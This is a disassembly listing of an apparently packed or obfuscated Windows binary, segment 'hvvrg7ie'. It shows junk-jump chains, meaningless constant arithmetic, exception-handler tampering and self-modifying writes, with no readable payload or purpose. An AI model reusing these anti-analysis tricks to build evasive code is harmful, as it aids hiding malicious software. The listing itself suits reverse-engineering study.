loc_44A79A:				; CODE XREF: sub_453BA4-108Bj
		jmp	loc_44A803
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------

loc_44A79F:				; CODE XREF: hvvrg7ie:0043BC1Fj
		jg	loc_4527C1
		jns	loc_455C2C
		jmp	sub_44D3E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_44A7B0:				; CODE XREF: sub_445CB5-43E3j
		sbb	eax, 0A72B3ADFh

loc_44A7B6:				; CODE XREF: sub_445CB5:loc_45447Fj
		push	eax
		lea	eax, dword_447B64
		push	eax
		push	eax
		jmp	loc_44B2BF
; END OF FUNCTION CHUNK	FOR sub_445CB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44A7C4:				; CODE XREF: sub_45A7E8-1B5E5j
		test	esi, 0DD9D78DAh
		jmp	loc_445624
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------

loc_44A7CF:				; CODE XREF: hvvrg7ie:loc_44C24Bj
		push	offset loc_45301C
		jmp	loc_4588EE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_546. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44A7DA:				; CODE XREF: sub_442FD1+Dj
		jmp	loc_43A645
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_44A7DF:				; CODE XREF: hvvrg7ie:00456C5Aj
		add	eax, 0D406E1C9h
		mov	eax, [eax]
		mov	al, [eax]
		jns	loc_43DF42
		sub	al, 99h
		push	0A9344CC0h
		pop	edx

loc_44A7F7:				; CODE XREF: hvvrg7ie:0043BC45j
		jmp	loc_441760
; ---------------------------------------------------------------------------
		xchg	ebx, [esi]
		jmp	sub_44363B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_44A803:				; CODE XREF: sub_453BA4:loc_44A79Aj
		xchg	edi, [esp+8+var_8]
		jmp	loc_4563AD
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE90

loc_44A80B:				; CODE XREF: sub_44CE90:loc_447E1Bj
		push	587F5917h
		pop	ecx
		sub	ecx, 0C15F97F7h
		push	offset loc_43FE40
		jmp	locret_44B61A
; END OF FUNCTION CHUNK	FOR sub_44CE90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_524. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44A822:				; CODE XREF: sub_43A839:loc_452183j
		jl	loc_45AB17

loc_44A828:				; CODE XREF: hvvrg7ie:00459CE8j
		jmp	loc_43CA26
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------

loc_44A82D:				; CODE XREF: hvvrg7ie:00452CF3j
		jmp	loc_440EF9
; ---------------------------------------------------------------------------

loc_44A832:				; CODE XREF: hvvrg7ie:0043F411j
		jmp	loc_44F764
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44973C

loc_44A837:				; CODE XREF: sub_44973C-FCA8j
		jmp	loc_443551
; END OF FUNCTION CHUNK	FOR sub_44973C
; ---------------------------------------------------------------------------
		dd 0EF86C1F7h, 22E9D626h
		db 3Ch,	2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_44A847:				; CODE XREF: hvvrg7ie:0043ECE4j
		add	eax, 83F0C794h
		add	eax, ebp
		add	eax, 0E72449C9h
		popf
		call	sub_4421DE
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_44A85B:				; CODE XREF: sub_4435FA+CEE1j
		jmp	loc_459D16
; END OF FUNCTION CHUNK	FOR sub_4435FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_44A860:				; CODE XREF: sub_44543A+4C5Cj
		jmp	loc_4473D0
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44A865:				; CODE XREF: sub_442FD1:loc_44FDA2j
		xor	edx, 2F97FEA8h
		call	sub_451DE8
; END OF FUNCTION CHUNK	FOR sub_442FD1
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44A870:				; CODE XREF: sub_43E063+15A4j
		jmp	nullsub_248
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
		pop	ebp
		pushf
		jmp	sub_441B65
; ---------------------------------------------------------------------------

loc_44A87C:				; CODE XREF: hvvrg7ie:0043F2C5j
		and	edi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_44A87E	proc near		; CODE XREF: sub_4422A8+E91p

; FUNCTION CHUNK AT 0043AD7B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043D39E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DABD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004449E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446127 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044AB6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450CD1 SIZE 00000019 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_43DAC6
		lea	eax, [ebp-125h]
		jmp	loc_43DABD
sub_44A87E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44A89A:				; CODE XREF: sub_44616F+5E35j
					; sub_451B45:loc_459DC2j
		push	0F99B64Fh
		pop	eax
		and	eax, ds:4000F9h
		xor	eax, 0AD6AE96Eh
		and	eax, 0BA55E418h
		xor	eax, 0CBB75CE6h
		jmp	loc_44CC94
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------

loc_44A8BD:				; CODE XREF: hvvrg7ie:0043D8D8j
		jge	loc_43A083
		and	eax, 33602C9Eh
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44A8C9:				; CODE XREF: sub_45038B:loc_443434j
		add	ecx, 5EC5E776h
		xor	ecx, 7F44FE17h
		add	ecx, 0F6B06DB0h
		add	ecx, ebp
		jmp	loc_43AF0A
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465E5

loc_44A8E2:				; CODE XREF: sub_4465E5-C329j
		test	ebx, ecx
		jmp	loc_43DE3E
; END OF FUNCTION CHUNK	FOR sub_4465E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44A8E9:				; CODE XREF: sub_450AA8+D41j
		jl	loc_44BBE7
		or	edi, eax
		sub	ecx, 1558561Ch

loc_44A8F7:				; CODE XREF: sub_43D285:loc_43DFA3j
		popf
		pushf

loc_44A8F9:				; CODE XREF: sub_450AA8:loc_43D1F1j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_44F3AC
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_44A904:				; CODE XREF: sub_45061E:loc_43CDA1j
		call	sub_45642F

loc_44A909:				; CODE XREF: sub_44646D-B793j
		jmp	loc_43FF48
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------

loc_44A90E:				; CODE XREF: hvvrg7ie:0045275Bj
		ja	loc_4397AD

loc_44A914:				; CODE XREF: hvvrg7ie:loc_43DDBBj
		call	sub_44A91A
		retn

; =============== S U B	R O U T	I N E =======================================



sub_44A91A	proc near		; CODE XREF: hvvrg7ie:loc_44515Cp
					; hvvrg7ie:loc_44A914p

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043CB3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004428ED SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044FCD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450667 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451469 SIZE 00000019 BYTES

		call	sub_4451F7
		jo	loc_4428ED
		jmp	loc_43CB3B
sub_44A91A	endp

; ---------------------------------------------------------------------------

loc_44A92A:				; DATA XREF: hvvrg7ie:004408D8o
		test	al, al
		jz	loc_43F88F
		jmp	loc_45179E
; ---------------------------------------------------------------------------

loc_44A937:				; DATA XREF: sub_44D46F+3FB0o
		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		call	sub_442B77
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_44A945:				; CODE XREF: sub_44E68D+31B1j
		jmp	loc_4585F4
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------

loc_44A94A:				; CODE XREF: hvvrg7ie:004430BFj
		jmp	loc_43E2E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_44A94F:				; CODE XREF: sub_442301-47E7j
		jmp	loc_4391BA
; END OF FUNCTION CHUNK	FOR sub_442301
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44A954:				; CODE XREF: sub_449D38:loc_455EC5j
					; hvvrg7ie:00455EDFj
		rol	edx, 1Ah
		push	offset loc_455EE4
		jmp	nullsub_225
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------

loc_44A961:				; CODE XREF: hvvrg7ie:004584A3j
		cmp	al, 0A4h
		jz	loc_4560C6
		jmp	loc_44DD20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44A96E:				; CODE XREF: sub_45B163-F61Dj
					; sub_43F227:loc_458BDDj
		mov	dword ptr [eax], offset	dword_474244
		push	0
		lea	eax, [ebp-20h]
		push	edx
		mov	edx, eax
		jmp	loc_454EE5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		shl	edi, 17h
		jmp	sub_44D47A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_44A98A:				; CODE XREF: sub_4546E9-D38j
		jmp	loc_458B2C
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------

loc_44A98F:				; CODE XREF: hvvrg7ie:00449ABCj
		jmp	loc_43D938

; =============== S U B	R O U T	I N E =======================================



sub_44A994	proc near		; CODE XREF: sub_43E163+9B81p
					; sub_444B29+9766p

; FUNCTION CHUNK AT 0044BB75 SIZE 00000005 BYTES

		push	eax
		call	sub_4512A0
		push	eax
		push	eax
		call	sub_440643
		call	sub_447E20
		jmp	loc_44BB75
sub_44A994	endp

; ---------------------------------------------------------------------------
		mov	eax, 0D53D974Bh
		push	esi
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44A9B1:				; CODE XREF: sub_45889B:loc_4549B9j
		push	81D5341Dh
		ror	esi, 11h
		jmp	loc_45338A
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B5C

loc_44A9BE:				; CODE XREF: sub_454B5C+11j
		sub	edx, 80FB1D32h
		rol	edx, 1Bh
		and	edx, 0CA3CF9A1h
		push	offset sub_44EB20
		jmp	loc_43C2C1
; END OF FUNCTION CHUNK	FOR sub_454B5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44A9D7:				; CODE XREF: sub_43E128+A7ECj
		jo	loc_45829F
		jmp	loc_44CD27
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================



sub_44A9E2	proc near		; DATA XREF: sub_43D5FD+9222o
		add	eax, [ebp-4]
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		cmp	eax, [ebp-18h]
		jb	loc_441477
		jmp	loc_459AD3
sub_44A9E2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6B4

loc_44A9F9:				; CODE XREF: sub_44E6B4+17j
		push	offset loc_456593
		jmp	loc_458C08
; END OF FUNCTION CHUNK	FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_44AA03:				; CODE XREF: sub_44059F-1A49j
					; sub_44A6D7-352Aj
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_456DE7
		xchg	ebx, [esp+0]
		jmp	loc_43C37C
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------

loc_44AA15:				; CODE XREF: hvvrg7ie:00454F00j
		cmp	ebp, ecx
		jmp	loc_446F20

; =============== S U B	R O U T	I N E =======================================



sub_44AA1C	proc near		; CODE XREF: hvvrg7ie:0044905Aj
					; sub_440643:loc_44CBC3p

; FUNCTION CHUNK AT 0043C663 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DB5E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C313 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EC7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A4C1 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	ecx, 0ECCF8AC5h
		add	ecx, ebp
		push	eax
		push	0C5D5376Fh
		jmp	loc_44EC7E
sub_44AA1C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_44AA33:				; CODE XREF: sub_43EB47:loc_43B5B2j
		xchg	edi, [esp+8+var_8]
		push	offset sub_44772D
		jmp	nullsub_348
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_44AA40:				; CODE XREF: sub_448DE4+24j
		jbe	loc_441477
		jmp	loc_43CDFA
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_44AA4C:				; CODE XREF: sub_455087+378Ej
		jmp	loc_441EDA
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_44AA51:				; CODE XREF: sub_44C6D7-5EDEj
		jmp	loc_456B2E
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_44AA56:				; CODE XREF: sub_451176-10133j
		jmp	loc_4513F8
; END OF FUNCTION CHUNK	FOR sub_451176

; =============== S U B	R O U T	I N E =======================================



sub_44AA5B	proc near		; CODE XREF: sub_4544DD:loc_43DEEBj
					; sub_4453EC+D920p ...
		jz	sub_45B94B

loc_44AA61:				; CODE XREF: sub_456881:loc_448D91j
		call	sub_445591

loc_44AA66:				; CODE XREF: sub_456F2D+15j
		jmp	sub_4525FC
sub_44AA5B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44AA6B:				; CODE XREF: sub_43F227+133A3j
		jmp	loc_440233
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_44AA70:				; CODE XREF: sub_454463-B356j
		jmp	loc_452D1C
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------

loc_44AA75:				; CODE XREF: hvvrg7ie:loc_43D644j
		jz	loc_4586B1
		jmp	loc_44981C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443163

loc_44AA81:				; CODE XREF: sub_443163+12j
		jmp	loc_43EC15
; END OF FUNCTION CHUNK	FOR sub_443163
; ---------------------------------------------------------------------------

loc_44AA86:				; CODE XREF: hvvrg7ie:0043DC9Ej
		jmp	loc_43D741
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C8E0

loc_44AA8B:				; CODE XREF: sub_43C8E0:loc_452E5Ej
		popf

loc_44AA8C:				; CODE XREF: hvvrg7ie:00443C5Ej
		pushf
		mov	ebp, 9A357D4Bh
		jmp	loc_452023
; END OF FUNCTION CHUNK	FOR sub_43C8E0
; ---------------------------------------------------------------------------

loc_44AA97:				; CODE XREF: hvvrg7ie:0043E09Fj
		pop	ebx
		sub	ebx, 0F61366D4h
		add	ebx, 74CB7BE6h
		mov	[ebx], eax
		push	offset sub_441DF2
		jmp	locret_442FFA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_257. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446407

loc_44AAB1:				; CODE XREF: sub_446407:loc_451589j
		call	sub_43D052

loc_44AAB6:				; CODE XREF: hvvrg7ie:0043EBA7j
		jmp	loc_454AA6
; END OF FUNCTION CHUNK	FOR sub_446407
; ---------------------------------------------------------------------------

loc_44AABB:				; CODE XREF: hvvrg7ie:00456A6Bj
		jnb	loc_459450

; =============== S U B	R O U T	I N E =======================================



sub_44AAC1	proc near		; CODE XREF: sub_443E65:loc_4410BBp
		xchg	ebx, [esp+0]
		pop	ebx
		jmp	loc_44FAF8
sub_44AAC1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B8D

loc_44AACA:				; CODE XREF: sub_442B8D+5FE6j
		pop	large dword ptr	fs:0
		add	esp, 4
; END OF FUNCTION CHUNK	FOR sub_442B8D
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44AAD4:				; CODE XREF: sub_43AB99+Ej
		pop	ecx
		jmp	loc_441BF0
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------

locret_44AADA:				; CODE XREF: hvvrg7ie:loc_45232Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44AADB:				; CODE XREF: sub_442FD1-1534j
		jmp	loc_43C77E
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_44AAE0:				; CODE XREF: hvvrg7ie:loc_439E2Ej
		xor	esi, 0AB42472Dh
		test	esi, 10000h
		jmp	loc_454849
; ---------------------------------------------------------------------------
		mov	eax, 0F75CA70h
		call	sub_450C5A
		mov	ds:dword_41D0D8, eax
		lea	eax, nullsub_3
		jmp	loc_44B277
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_44AB0C:				; CODE XREF: sub_447E56:loc_44807Fj
		add	edi, 2B8FE4Ch
		mov	[edi], eax
		pop	edi
		lea	eax, loc_454604
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FAB4
; END OF FUNCTION CHUNK	FOR sub_447E56

; =============== S U B	R O U T	I N E =======================================



sub_44AB23	proc near		; CODE XREF: sub_413D26j
					; sub_44AB23:loc_440894j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00440894 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443E22 SIZE 00000005 BYTES

		call	sub_4408AE
		jmp	loc_443E22
sub_44AB23	endp


; =============== S U B	R O U T	I N E =======================================



sub_44AB2D	proc near		; CODE XREF: hvvrg7ie:0043AC7Bj
					; sub_44BEBB:loc_450862p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004443C3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448850 SIZE 00000006 BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		xchg	eax, [esp+0]
		mov	ebx, eax

loc_44AB36:				; CODE XREF: sub_45038B:loc_44B12Aj
		pop	eax
		xor	eax, 9C4E704Eh
		jmp	loc_4443C3
sub_44AB2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F65

loc_44AB42:				; CODE XREF: sub_451F65:loc_44D46Aj
		push	offset sub_44AE42
		jmp	loc_4499C7
; END OF FUNCTION CHUNK	FOR sub_451F65

; =============== S U B	R O U T	I N E =======================================



sub_44AB4C	proc near		; DATA XREF: sub_45889B-D431o
		push	1B587915h
		pop	eax
		or	eax, 0A97E0E0Eh
		xor	eax, 2073C7BCh
		sub	eax, ds:4000F4h

loc_44AB64:				; CODE XREF: sub_44955C:loc_45B416j
		call	sub_445F2A
sub_44AB4C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43FC1D

loc_44AB69:				; CODE XREF: sub_43FC1D+1859Bj
		jmp	loc_439BAD
; END OF FUNCTION CHUNK	FOR sub_43FC1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_44AB6E:				; CODE XREF: sub_44A87E-4754j
		jmp	loc_450CD1
; END OF FUNCTION CHUNK	FOR sub_44A87E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44AB73:				; CODE XREF: sub_450F97-D4A9j
		jmp	loc_453D38
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_44AB78:				; CODE XREF: sub_445F2A+B7A6j
		add	ebx, 0CC155DBDh
		pop	ebp
		xor	edx, 366C779Ch
		cmp	esi, 4054CFCEh
		jmp	loc_446CC5
; END OF FUNCTION CHUNK	FOR sub_445F2A

; =============== S U B	R O U T	I N E =======================================



sub_44AB90	proc near		; DATA XREF: sub_452E74-B81Co

; FUNCTION CHUNK AT 0043F3A6 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044070C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00441DF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045255B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045424A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455411 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459016 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B2BE SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		mov	ebp, esi
		pop	esi
		mov	eax, ds:dword_439CB0
		or	eax, eax
		jmp	loc_441DF8
sub_44AB90	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44ABA3	proc near		; DATA XREF: sub_44388C-7334o

; FUNCTION CHUNK AT 0043D5DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DE97 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004416F4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004527D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457651 SIZE 00000008 BYTES

		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45764C
		jmp	loc_4527D7
sub_44ABA3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_44ABB2:				; CODE XREF: sub_4414F6+BBC9j
		jnz	loc_44CA2B

loc_44ABB8:				; CODE XREF: sub_4414F6:loc_439562j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_449EA9
		jmp	loc_43C6DD
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44ABC9:				; CODE XREF: sub_45889B:loc_4588A7j
		mov	edi, 6423A533h
		cmp	ebx, ecx
		jmp	loc_44E97F
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_44ABD5:				; CODE XREF: sub_458706:loc_45B031j
		xor	edx, ebp
		jp	loc_4593E1
		test	edx, 0E6AAA52h
		jmp	loc_43E375
; END OF FUNCTION CHUNK	FOR sub_458706

; =============== S U B	R O U T	I N E =======================================



sub_44ABE8	proc near		; CODE XREF: hvvrg7ie:00442081j
					; hvvrg7ie:00448418p

; FUNCTION CHUNK AT 00442342 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	303E01BDh
		push	offset sub_44A230
		jmp	loc_442342
sub_44ABE8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F66B

loc_44ABFB:				; CODE XREF: sub_44F66B-F10Bj
		add	ebx, 36D6069Ch

loc_44AC01:				; CODE XREF: hvvrg7ie:0044035Fj
		xchg	ebx, [esp+8+var_8]
		jmp	loc_44C06C
; END OF FUNCTION CHUNK	FOR sub_44F66B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44AC09:				; CODE XREF: sub_454099-144C1j
		mov	eax, [ebp+8]
		push	edi
		push	eax
		mov	edi, 0D898AEB0h
		jmp	loc_45507B
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		popf

loc_44AC19:				; CODE XREF: hvvrg7ie:0044EABDj
		jmp	sub_44BEBB
; ---------------------------------------------------------------------------

loc_44AC1E:				; DATA XREF: sub_448100+1088o
		pop	esi
		mov	eax, [ebp-14h]
		add	eax, 0BCE8743Dh
		add	eax, 43178C23h
		mov	eax, [eax]
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44AC30:				; CODE XREF: sub_45889B:loc_439F4Bj
		add	eax, [ebp-4]
		jmp	loc_4438BA
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_44AC38:				; CODE XREF: hvvrg7ie:00452520j
		and	ecx, 8C46813Eh
		sub	ecx, 0AB1AC650h
		xor	ecx, 9C463F97h
		shl	ecx, 8
		and	ebx, eax
		jmp	loc_457FD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44AC54:				; CODE XREF: sub_446D8D-3E49j
		jno	loc_45AE1E
		jo	loc_45B357
		adc	ebx, ebp

loc_44AC62:				; CODE XREF: hvvrg7ie:loc_43F49Fj
		add	eax, 0EE3947FFh
		jmp	loc_43A23F
; END OF FUNCTION CHUNK	FOR sub_446D8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_280. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44AC6E	proc near		; CODE XREF: hvvrg7ie:loc_456BEEj
					; DATA XREF: sub_43BFE7:loc_43FDD3o

; FUNCTION CHUNK AT 00439E05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB1B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AB69 SIZE 00000005 BYTES

		jnb	loc_44FB1B
		push	offset sub_44FB04
		jmp	nullsub_325
sub_44AC6E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_44AC7E:				; CODE XREF: sub_451E6D:loc_4515C6j
					; hvvrg7ie:004515E9j
		rol	eax, 7
		xor	eax, 4875244Ah
		add	eax, ebp
		add	eax, 0B8706F2Bh
		mov	eax, [eax]
		push	eax
		call	sub_4584F2
		jmp	loc_43D52C
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_44AC9C:				; CODE XREF: sub_455087:loc_44EDDDj
		push	offset loc_43C221
		jmp	nullsub_341
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_44ACA6:				; CODE XREF: sub_456F9F-8BF3j
		mov	eax, 2DC123E0h
		call	sub_450C5A
		mov	ds:off_41D124, eax
		lea	eax, loc_44E39C
		jmp	loc_43C6F4
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_44ACC1:				; CODE XREF: sub_43E26C:loc_4494AFj
		call	sub_43DD2C
; END OF FUNCTION CHUNK	FOR sub_43E26C
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_44ACC6:				; CODE XREF: sub_44370F+6D09j
		jmp	loc_443681
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------

loc_44ACCB:				; CODE XREF: hvvrg7ie:0043CAD7j
		jmp	loc_440845
; ---------------------------------------------------------------------------

loc_44ACD0:				; CODE XREF: hvvrg7ie:004487CBj
		add	ecx, esi

loc_44ACD2:				; CODE XREF: hvvrg7ie:loc_4487B6j
		rol	edx, 8
		sub	edx, 0E123B56Bh
		add	edx, 1EBF614h
		jmp	loc_439451
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BE8

loc_44ACE6:				; CODE XREF: sub_448BE8-F606j
		jl	loc_44CC3D
; END OF FUNCTION CHUNK	FOR sub_448BE8
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_44ACEC:				; CODE XREF: sub_44059F+11A1Fj
		jmp	loc_445607
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		cmp	ecx, 8D3E3CCBh
		jmp	loc_455E70
; ---------------------------------------------------------------------------

loc_44ACFC:				; CODE XREF: hvvrg7ie:00440365j
		ja	loc_4447C1
		adc	edi, ecx
; START	OF FUNCTION CHUNK FOR sub_452637

loc_44AD04:				; CODE XREF: sub_452637:loc_44034Fj
		add	edi, 0DF9E12F3h
		popf
		jmp	loc_43EC2F
